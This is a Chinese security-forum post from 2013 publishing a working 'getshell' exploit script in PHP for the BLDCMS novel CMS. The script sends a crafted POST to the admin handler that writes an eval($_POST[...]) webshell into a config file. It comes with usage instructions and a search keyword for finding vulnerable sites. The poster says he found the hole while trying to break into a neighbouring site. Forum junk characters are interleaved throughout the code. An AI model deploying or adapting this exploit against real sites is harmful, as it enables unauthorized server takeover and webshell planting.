找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2218|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
# K4 _" h, T' c% S/ ^
0 O; q, P& F. k( E
3 q$ C9 e. J( W( v/ p& v3 N) ?话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ; @, ~; ^3 Z* }% t

8 Y, u( @* {. W. Z5 g既然都有人发了 我就把我之前写好的EXP放出来吧
2 v) V  p* Z/ [. R0 g
9 [" F2 t/ P& Hview source print?01.php;">! D9 p2 j2 z+ |+ `' P5 ?0 h( S! J# f
02.<!--?php
, `( @2 o' n9 N( b4 {03.echo "-------------------------------------------------------------------
% j7 @! n1 _7 f04. & S6 X0 A! L2 y4 h" ~/ d
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
( f( H* c' ^# Z8 H# s. T" d06. * L6 G+ t$ H; v; y4 x6 B$ n
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
: l: |5 v- m0 w08.
; \& u7 {: P$ J9 U* Y09.QQ:981009941\r\n                                2013.3.21\r\n            
1 U- @" ?9 r. m/ p/ n! B# E10. : S& ^! q; c7 C3 v6 M
11.
6 I( U$ v9 U% [* J12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
1 G% I1 p1 y. a: u1 p4 B/ a. w13. 0 r/ ^- q. a/ L# |2 y
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
: \) Z) X+ w1 |6 d$ i. [15.
: \9 y3 ]/ ~, `: O( w+ k. e16.--------------------------------------------------------------------\r\n";
# j8 {5 z6 F: V9 h+ `0 ]' H17.$url=$argv[1];
* ^. A. o. E0 g18.$dir=$argv[2];
* o# h4 t% x' G4 ~" Z# x19.$pass=$argv[3];/ }8 ]; P9 |; U% N7 m
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
, @- {. [: B1 m- |4 z3 ]21.if (emptyempty($pass)||emptyempty($url))
1 y: r  U# M" K. H22.{exit("请输入参数");}* \- @2 H- G: [8 p9 s" y& _1 G3 ?
23.else
9 G' W! [/ M' _4 g  Z& C24.{" d0 S- K8 p% M4 J+ L- Y. Q! \; V
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev1 f) x" @2 ?' U- v+ X) N
26. 1 }5 ~, n2 w+ c. Y. p1 C1 @
27.al;5 e0 Y, O. S* H9 c
28.$length = strlen($fuckdata);
) x' ~1 o9 J1 i4 s) w29.function getshell($url,$pass)
# @1 K( L1 C. L$ S4 f; K9 l30.{
: T+ u' e* P% R& B, Y, j6 w5 o31.global $url,$dir,$pass,$eval,$length,$fuckdata;0 e$ q6 b% n* L4 z: A# _2 u" v. T) g  f" O
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";( o# H/ H+ z, s
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";9 |0 M3 f' f4 p( r( F7 g: U
34.$header .= "User-Agent: MSIE\r\n";' @0 d! A! t& p0 m) T2 f2 P
35.$header .= "Host:".$url."\r\n";+ q0 D5 E+ C) X) `' a( W
36.$header .= "Content-Length: ".$length."\r\n";
  S, Q& R7 p. V6 L37.$header .= "Connection: Close\r\n";
2 b, y! N% u( B4 h3 e" |4 Z38.$header .="\r\n";
+ d$ b8 `" j- L+ W3 y39.$header .= $fuckdata."\r\n\r\n";* p0 b! e; M) [4 i' [  |3 N
40.$fp = fsockopen($url, 80,$errno,$errstr,15);2 _& E5 I) O& z' v1 D
41.if (!$fp)& @9 S5 @' j$ K( {) T- V
42.{
% e* E; k1 J8 k2 A: X, j  s9 Y43.exit ("利用失败:请检查指定目标是否能正常打开");, J5 q& B" \7 D3 x# w
44.}0 q5 s; g# E& Q# Z5 K) K
45.else{ if (!fputs($fp,$header))
9 o- P6 [4 a) Z+ L46.{exit ("利用失败");}) I! Z5 a' L% b5 Z
47.else
' L) q/ C8 ^1 {: [- m2 H! e48.{
9 J; ?8 t3 b5 [49.$receive = '';
. r7 M, r2 e, o% N. Q3 J# `0 L0 J0 X50.while (!feof($fp)) {
+ c& t( z# N( ?: i& Y, K6 n' N51.$receive .= @fgets($fp, 1000);) s1 f( H1 v# L6 x, X
52.}
1 c3 f6 C" s: I" E1 O53.@fclose($fp);% Q4 D' g* U$ A6 u
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标6 b; }& I& J4 [) l8 i8 R6 y
55. . F. S6 s. c6 h: q/ ]1 J% b& ]2 H$ w: m
56.GPC是否=off)";
2 ]* Q) |; |. D2 K! c" p/ u57.}}5 @* p" H- ?' x1 F
58.}
# k* u( p$ S3 [& I59.}
0 x7 c; F& u$ b: P7 N+ x' s60.getshell($url,$pass);
+ k7 \2 d4 A8 y$ Y5 s: _$ ?61.?-->: ]: m$ Y% ~6 ^9 V+ K! `

# \" `" m' \% F) U
& }0 c" g5 J1 L& P9 F! n & [& {8 x' p+ R% ^; q( l! e" Q2 `, {( S
by 数据流$ Y+ L0 k2 z1 m  m/ h5 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表